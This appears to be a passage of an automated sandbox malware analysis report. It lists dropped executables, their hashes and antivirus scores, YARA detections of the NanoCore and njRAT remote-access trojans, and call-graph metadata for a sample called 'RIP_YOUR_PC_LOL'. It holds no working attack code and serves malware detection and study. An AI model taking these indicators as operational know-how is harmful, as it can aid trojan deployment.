                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.414807841.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.416456851.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000002.700831183.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000009.00000000.415266906.0000000000842000.00000002.00000001.01000000.0000000A.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000009.00000002.708577022.0000000005870000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: 00000009.00000002.708751563.0000000005B00000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Florian Roth
                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NanoCore, Description: Detects NanoCore, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: ditekSHen
                                                                                                        • Rule: NanoCore, Description: unknown, Source: C:\Users\user\AppData\Roaming\Opus.exe, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:11
                                                                                                        Start time:18:00:57
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\22.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\22.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:2101248 bytes
                                                                                                        MD5 hash:DBF9DAA1707B1037E28A6E0694B33A4B
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Yara matches:
                                                                                                        • Rule: MALWARE_Win_BlackMoon, Description: Detects executables using BlackMoon RunTime, Source: C:\Users\user\AppData\Roaming\22.exe, Author: ditekSHen
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 38%, Metadefender, Browse
                                                                                                        • Detection: 86%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:12
                                                                                                        Start time:18:00:57
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\aaa.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\aaa.exe"
                                                                                                        Imagebase:0x2c0000
                                                                                                        File size:122880 bytes
                                                                                                        MD5 hash:860AA57FC3578F7037BB27FC79B2A62C
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:14
                                                                                                        Start time:18:00:59
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:1241088 bytes
                                                                                                        MD5 hash:8F1C8B40C7BE588389A8D382040B23BB
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:Visual Basic
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 26%, Metadefender, Browse
                                                                                                        • Detection: 86%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:15
                                                                                                        Start time:18:00:59
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe"
                                                                                                        Imagebase:0x400000
                                                                                                        File size:549556 bytes
                                                                                                        MD5 hash:0FD7DE5367376231A788872005D7ED4F
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:16
                                                                                                        Start time:18:01:04
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\4.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\4.exe"
                                                                                                        Imagebase:0x11d0000
                                                                                                        File size:579127 bytes
                                                                                                        MD5 hash:E6DACE3F577AC7A6F9747B4A0956C8D7
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:C, C++ or other language
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        • Detection: 17%, Metadefender, Browse
                                                                                                        • Detection: 75%, ReversingLabs
                                                                                                        Reputation:low

                                                                                                        General

                                                                                                        Target ID:17
                                                                                                        Start time:18:01:07
                                                                                                        Start date:08/03/2022
                                                                                                        Path:C:\Users\user\AppData\Roaming\mediaget.exe
                                                                                                        Wow64 process (32bit):true
                                                                                                        Commandline:"C:\Users\user\AppData\Roaming\mediaget.exe"
                                                                                                        Imagebase:0xab0000
                                                                                                        File size:37888 bytes
                                                                                                        MD5 hash:8EEDC01C11B251481DEC59E5308DCCC3
                                                                                                        Has elevated privileges:true
                                                                                                        Has administrator privileges:true
                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                        Yara matches:
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.445953483.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000002.701265514.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000003.646152049.0000000001338000.00000004.00000020.00020000.00000000.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.445251023.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.447375879.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: 00000011.00000000.446671445.0000000000AB2000.00000002.00000001.01000000.0000000F.sdmp, Author: Brian Wallace @botnet_hunter
                                                                                                        • Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Joe Security
                                                                                                        • Rule: MALWARE_Win_NjRAT, Description: Detects NjRAT / Bladabindi, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: ditekSHen
                                                                                                        • Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Roaming\mediaget.exe, Author: Brian Wallace @botnet_hunter
                                                                                                        Antivirus matches:
                                                                                                        • Detection: 100%, Avira
                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                        Reputation:low

                                                                                                        Disassembly

                                                                                                        Reset < >

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:29%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:0%
                                                                                                          Total number of Nodes:29
                                                                                                          Total number of Limit Nodes:2
                                                                                                          execution_graph 739 283a5e3 741 283a616 GetFileType 739->741 742 283a678 741->742 703 283a452 704 283a48a CreateFileW 703->704 706 283a4d9 704->706 711 283a6d6 713 283a70b WriteFile 711->713 714 283a73d 713->714 727 283a6a4 728 283a6d6 WriteFile 727->728 730 283a73d 728->730 723 283a41b 725 283a452 CreateFileW 723->725 726 283a4d9 725->726 715 283a56a 716 283a596 FindCloseChangeNotification 715->716 717 283a5d5 715->717 718 283a5a4 716->718 717->716 731 283a528 732 283a536 FindCloseChangeNotification 731->732 734 283a5a4 732->734 719 283a2fe 720 283a353 719->720 721 283a32a SetErrorMode 719->721 720->721 722 283a33f 721->722 735 283a2dc 736 283a2fe SetErrorMode 735->736 738 283a33f 736->738

                                                                                                          Callgraph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          • Opacity -> Relevance
                                                                                                          • Disassembly available
                                                                                                          callgraph 0 Function_0283A005 1 Function_043402BA 2 Function_0283A392 3 Function_043408A5 4 Function_043402A6 5 Function_043406A0 48 Function_04340751 5->48 59 Function_043408C0 5->59 6 Function_0283A616 7 Function_0283A41B 8 Function_0283AA1B 9 Function_021A0003 10 Function_0283A99A 11 Function_0283A09A 12 Function_0283A120 13 Function_021A05BF 27 Function_021A065A 13->27 14 Function_0283A6A4 15 Function_04340893 16 Function_0434089E 17 Function_0283A528 18 Function_0283A02E 19 Function_0283A82E 20 Function_04340006 20->20 29 Function_04340070 20->29 38 Function_021A05CF 20->38 53 Function_021A05F6 20->53 60 Function_04340140 20->60 21 Function_021A05AF 21->27 22 Function_0434028C 23 Function_0283A7BA 24 Function_0434070E 25 Function_0434068F 25->48 25->59 26 Function_04340688 28 Function_04340276 29->20 29->29 29->38 29->53 29->60 30 Function_043402F0 43 Function_04340569 30->43 31 Function_021A025D 32 Function_0434067C 33 Function_0283A8C8 34 Function_0283AA4E 35 Function_0283A452 36 Function_04340865 37 Function_0283A6D6 39 Function_043402E2 39->43 40 Function_04340662 41 Function_0283A85A 42 Function_0434046F 42->5 42->25 42->38 42->53 44 Function_0283A2DC 45 Function_0283A5E3 46 Function_0283A262 47 Function_0283A361 49 Function_04340551 50 Function_0283A965 51 Function_0283A56A 52 Function_0434085D 54 Function_0434025A 55 Function_0434055A 56 Function_0283A172 57 Function_0283A8F2 58 Function_04340847 61 Function_021A066F 62 Function_021A006D 63 Function_0283A1F4 64 Function_0434064C 65 Function_0283A078 66 Function_0283A978 67 Function_0283A77F 68 Function_04340548 69 Function_0283A2FE

                                                                                                          Executed Functions

                                                                                                          Function 0283A41B Relevance: 1.6, APIs: 1, Instructions: 98fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 0 283a41b-283a4aa 4 283a4af-283a4bb 0->4 5 283a4ac 0->5 6 283a4c0-283a4c9 4->6 7 283a4bd 4->7 5->4 8 283a4cb-283a4ef CreateFileW 6->8 9 283a51a-283a51f 6->9 7->6 12 283a521-283a526 8->12 13 283a4f1-283a517 8->13 9->8 12->13
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 1a94cc15156b47513fe63fe49a528205f0e5b672862d4f5be048290d454cd1f2
                                                                                                          • Instruction ID: a9e441fd2b587874131cdb26e897e37f0194ee8149d94576b7a849cf046fe53a
                                                                                                          • Opcode Fuzzy Hash: 1a94cc15156b47513fe63fe49a528205f0e5b672862d4f5be048290d454cd1f2
                                                                                                          • Instruction Fuzzy Hash: 9C3170B6505380AFE722CF65DC45F62BFE8EF05224F08849EE9849B252D375E509CB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A452 Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 16 283a452-283a4aa 19 283a4af-283a4bb 16->19 20 283a4ac 16->20 21 283a4c0-283a4c9 19->21 22 283a4bd 19->22 20->19 23 283a4cb-283a4d3 CreateFileW 21->23 24 283a51a-283a51f 21->24 22->21 25 283a4d9-283a4ef 23->25 24->23 27 283a521-283a526 25->27 28 283a4f1-283a517 25->28 27->28
                                                                                                          APIs
                                                                                                          • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0283A4D1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: ac25e2ece9864fe1a9959ef9b487c925059bb7cc328e51115eece4ff51aebe1f
                                                                                                          • Instruction ID: af98980c3ae6679796feae71b92af644764b8576359c550a66632e5bf066f94a
                                                                                                          • Opcode Fuzzy Hash: ac25e2ece9864fe1a9959ef9b487c925059bb7cc328e51115eece4ff51aebe1f
                                                                                                          • Instruction Fuzzy Hash: 0221B07A500600AFEB21DF65DC45B66FBE8EF08224F08886DED89DB251D375E408CBB5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A6A4 Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 31 283a6a4-283a72d 35 283a771-283a776 31->35 36 283a72f-283a74f WriteFile 31->36 35->36 39 283a751-283a76e 36->39 40 283a778-283a77d 36->40 40->39
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: 29e035e1a7ece16f59450487ee963f4b63b4cdff9cc33c7c931afb874119f10a
                                                                                                          • Instruction ID: b0685497bee86797c202abb8d34ab6182813cf9ea1920abbd6ef6f02d09039d3
                                                                                                          • Opcode Fuzzy Hash: 29e035e1a7ece16f59450487ee963f4b63b4cdff9cc33c7c931afb874119f10a
                                                                                                          • Instruction Fuzzy Hash: 6421A475409380AFE7228F61DC45F66BFB8EF46310F09849BED849F163C265A509CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A5E3 Relevance: 1.6, APIs: 1, Instructions: 73COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 43 283a5e3-283a661 47 283a663-283a676 GetFileType 43->47 48 283a696-283a69b 43->48 49 283a678-283a695 47->49 50 283a69d-283a6a2 47->50 48->47 50->49
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: ab5a83218e2cddedd9db2857c6c126779a350f32e157d5f3f93b3f20d1eff470
                                                                                                          • Instruction ID: 9d860a44e7e09a63b63154dba5d221c2944db427a8a7825b43b7b97d2e8c0e24
                                                                                                          • Opcode Fuzzy Hash: ab5a83218e2cddedd9db2857c6c126779a350f32e157d5f3f93b3f20d1eff470
                                                                                                          • Instruction Fuzzy Hash: 5B21D8B54083806FE7128B61DC41FA2BFA8DF46320F0884DBED849F253D268A909DB71
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A528 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 54 283a528-283a534 55 283a536-283a54d 54->55 56 283a54e-283a594 54->56 55->56 58 283a596-283a59e FindCloseChangeNotification 56->58 59 283a5d5-283a5da 56->59 60 283a5a4-283a5b6 58->60 59->58 62 283a5b8-283a5d4 60->62 63 283a5dc-283a5e1 60->63 63->62
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0283A59C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: 820f3863a893a9f864ca323df8810770cd51d50786b1ad7cff1a038535fa6634
                                                                                                          • Instruction ID: 7ec729180d7a6a6b25b99d6008cfc51757eab7b3aea5f24e4f86b0f44066f751
                                                                                                          • Opcode Fuzzy Hash: 820f3863a893a9f864ca323df8810770cd51d50786b1ad7cff1a038535fa6634
                                                                                                          • Instruction Fuzzy Hash: 19218C7640D7C49FD7138B259C55692BFB4AF06220F0980DBDC858F1A7D2689808CB72
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A6D6 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 65 283a6d6-283a72d 68 283a771-283a776 65->68 69 283a72f-283a737 WriteFile 65->69 68->69 71 283a73d-283a74f 69->71 72 283a751-283a76e 71->72 73 283a778-283a77d 71->73 73->72
                                                                                                          APIs
                                                                                                          • WriteFile.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A735
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileWrite
                                                                                                          • String ID:
                                                                                                          • API String ID: 3934441357-0
                                                                                                          • Opcode ID: b0b737d43833b47a5b7debb2bc6d0bfbcf7fc284e075f3cc491b3c4c5f07293f
                                                                                                          • Instruction ID: 1d0f546f303afcf779cf526c05ecdfb3f8adda7c743ade286f9fd18a3603cc71
                                                                                                          • Opcode Fuzzy Hash: b0b737d43833b47a5b7debb2bc6d0bfbcf7fc284e075f3cc491b3c4c5f07293f
                                                                                                          • Instruction Fuzzy Hash: AA11E776404204AFEB21DF51DC85F66FBF8EF04320F14846AED859B251D279A508CFB1
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A616 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 76 283a616-283a661 79 283a663-283a676 GetFileType 76->79 80 283a696-283a69b 76->80 81 283a678-283a695 79->81 82 283a69d-283a6a2 79->82 80->79 82->81
                                                                                                          APIs
                                                                                                          • GetFileType.KERNELBASE(?,00000E2C,EB14EF02,00000000,00000000,00000000,00000000), ref: 0283A669
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FileType
                                                                                                          • String ID:
                                                                                                          • API String ID: 3081899298-0
                                                                                                          • Opcode ID: 6e6e228e2014837057331894b063226302b7293dd7fe88625c454412038a9c72
                                                                                                          • Instruction ID: 34eb1dda16d5034bdc45ef9c57c4f8a253f75d12fe180ea99e655c481ef35d97
                                                                                                          • Opcode Fuzzy Hash: 6e6e228e2014837057331894b063226302b7293dd7fe88625c454412038a9c72
                                                                                                          • Instruction Fuzzy Hash: 2501D27A504204AFF711CB51DC85F66FB98DF44720F18C4AAED49AB352E278E508CEB5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A2DC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 86 283a2dc-283a328 88 283a353-283a358 86->88 89 283a32a-283a33d SetErrorMode 86->89 88->89 90 283a35a-283a35f 89->90 91 283a33f-283a352 89->91 90->91
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0283A330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode
                                                                                                          • String ID:
                                                                                                          • API String ID: 2340568224-0
                                                                                                          • Opcode ID: 0ae96d242524b2f8a8deb637a8e75047d8feb50e825f52ac911ed5978d3ce860
                                                                                                          • Instruction ID: acb6422df959efb65d3b0dff2419ade455e96bfa33fd4df9203d97ca032e0596
                                                                                                          • Opcode Fuzzy Hash: 0ae96d242524b2f8a8deb637a8e75047d8feb50e825f52ac911ed5978d3ce860
                                                                                                          • Instruction Fuzzy Hash: 3A111E75409384AFD7128B15DC44B62FFB4EF46724F0D80DAED898B252D265A908DBB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A56A Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 94 283a56a-283a594 95 283a596-283a59e FindCloseChangeNotification 94->95 96 283a5d5-283a5da 94->96 97 283a5a4-283a5b6 95->97 96->95 99 283a5b8-283a5d4 97->99 100 283a5dc-283a5e1 97->100 100->99
                                                                                                          APIs
                                                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 0283A59C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_283a000_RIP_YOUR_PC_LOL.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ChangeCloseFindNotification
                                                                                                          • String ID:
                                                                                                          • API String ID: 2591292051-0
                                                                                                          • Opcode ID: 2ae1e07bae99bf964826e572805d717a7d2988d4b3c25e8c8bf5bd6da4571c4b
                                                                                                          • Instruction ID: bf8833fee8abb9b1a724cec33d515382ac62c99c0ae39aecce6976ef95e54f63
                                                                                                          • Opcode Fuzzy Hash: 2ae1e07bae99bf964826e572805d717a7d2988d4b3c25e8c8bf5bd6da4571c4b
                                                                                                          • Instruction Fuzzy Hash: D601DF7A5042448FDB158F65E889766FBA4DF04220F08C0AADD49CF216D678E408CFB2
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 0283A2FE Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 102 283a2fe-283a328 103 283a353-283a358 102->103 104 283a32a-283a33d SetErrorMode 102->104 103->104 105 283a35a-283a35f 104->105 106 283a33f-283a352 104->106 105->106
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNELBASE(?), ref: 0283A330
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.695692735.000000000283A000.00000040.00000800.00020000.00000000.sdmp, Offset: 0283A000, based on PE: false
